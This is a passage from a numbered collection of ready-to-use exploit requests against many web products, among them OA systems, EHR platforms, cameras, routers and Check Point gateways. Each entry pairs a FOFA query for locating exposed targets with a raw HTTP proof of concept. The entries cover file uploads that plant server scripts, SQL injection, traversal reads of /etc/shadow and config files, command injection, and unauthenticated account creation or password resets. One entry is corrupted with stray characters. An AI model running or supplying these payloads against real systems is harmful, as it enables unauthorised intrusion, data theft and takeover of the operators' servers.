User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机任意文件读取$ H; o2 P* o3 u
FOFA:app="DT-高清车牌识别摄像机"
& X& m8 [5 p1 eGET /../../../../etc/passwd HTTP/1.1
* j( I, l. K* ]$ C& u1 [# MHost: your-ip
7 q/ O8 h! r3 Z; F, hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 z9 M- m' t( K) o5 h) PAccept-Encoding: gzip, deflate
* {& r/ b9 `' X: ]% l4 Z- ?Accept: */*1 C  E4 g* S9 {6 R+ p8 F$ C( P4 [
Connection: keep-alive0 r" `" t& a. Q3 P% O0 r
2 U, K7 r* b- B, p8 i

. u: f6 W7 a) Y9 ^: h0 H
173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C校园网自助服务系统 flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload interface file upload

1. Run the PoC to obtain the CSRF value, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Substitute the __VIEWSTATE and __EVENTVALIDATION values obtained above into the request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type: image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

